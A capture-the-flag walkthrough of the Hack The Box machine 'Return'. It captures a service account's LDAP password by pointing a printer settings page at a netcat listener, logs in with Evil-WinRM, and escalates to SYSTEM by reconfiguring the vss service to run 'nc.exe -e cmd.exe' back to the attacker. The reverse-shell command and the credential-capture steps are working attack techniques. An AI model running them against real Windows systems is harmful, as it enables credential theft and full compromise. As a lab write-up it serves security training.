HTB Return

$ nmap -sV -p- 10.10.11.108 -Pn --min-rate 5000

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
80/tcp    open  http          syn-ack Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2022-01-22 22:59:02Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49671/tcp open  msrpc         syn-ack Microsoft Windows RPC
49674/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         syn-ack Microsoft Windows RPC
49679/tcp open  msrpc         syn-ack Microsoft Windows RPC
49682/tcp open  msrpc         syn-ack Microsoft Windows RPC
49694/tcp open  msrpc         syn-ack Microsoft Windows RPC
64882/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Nmap done: 1 IP address (1 host up) scanned in 77.08 seconds

http://10.10.11.108/

http://10.10.11.108/settings.php

If we add our IP into the Server Address field:

$ sudo nc -lvnp 389

listening on [any] 389 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.11.108] 64083
0*`%return\svc-printer�
                       1edFg43012!!

We get a connection and the svc-printer password.

svc-printer:1edFg43012!!

You can read more about this technique here.

According to the nmap scan, WinRM is available, so we can try to use Evil-WinRM to connect to the machine.

5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

If it is not already installed in your machine you can do it using this ruby command:

# gem install evil-winrm

$ evil-winrm -i 10.10.11.108 -u svc-printer -p '1edFg43012!!'

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-printer\Documents> 

From here we just need to get our user’s flag.

Evil-WinRM PS C:\Users\svc-printer\Desktop> type user.txt

1c6eXXXXXXXXXXXXXXXXXXXXXXXXXXXX

For the privilege escalation we can start checking user details:

Evil-WinRM PS C:\Users\svc-printer\Desktop> net user svc-printer

User name                    svc-printer
Full Name                    SVCPrinter
Comment                      Service Account for Printer
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/26/2021 12:15:13 AM
Password expires             Never
Password changeable          5/27/2021 12:15:13 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   5/26/2021 12:39:29 AM

Logon hours allowed          All

Local Group Memberships      *Print Operators      *Remote Management Use
                             *Server Operators
Global Group memberships     *Domain Users
The command completed successfully.

This user belongs to the group «Server Operators».

According to the Microsoft documentation,

…Members of the Server Operators group can sign in to a server interactively, create and delete network shared resources, start and stop services, back up and restore files, format the hard disk drive of the computer, and shut down the computer. …

https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#bkmk-serveroperators

Based on this information:

Evil-WinRM PS C:\Users\svc-printer\Documents> upload /usr/share/windows-binaries/nc.exe

Info: Uploading /usr/share/windows-binaries/nc.exe to C:\Users\svc-printer\Documents\nc.exe
                                                             
Data: 79188 bytes of 79188 bytes copied

Info: Upload successful!

Now we can modify one of the current services.

More information about sc.exe and its options can be found here

Evil-WinRM PS C:\Users\svc-printer\Documents>sc.exe config vss binPath="C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.14.14 1234
Evil-WinRM PS C:\Users\svc-printer\Documents>sc.exe stop vss
Evil-WinRM PS C:\Users\svc-printer\Documents>sc.exe start vss

$ sudo nc -lvnp 1234

listening on [any] 1234 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.11.108] 52509
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

C:\Windows\system32>whoami

whoami
nt authority\system

And finally, get our root’s flag.

0e21XXXXXXXXXXXXXXXXXXXXXXXXXXXX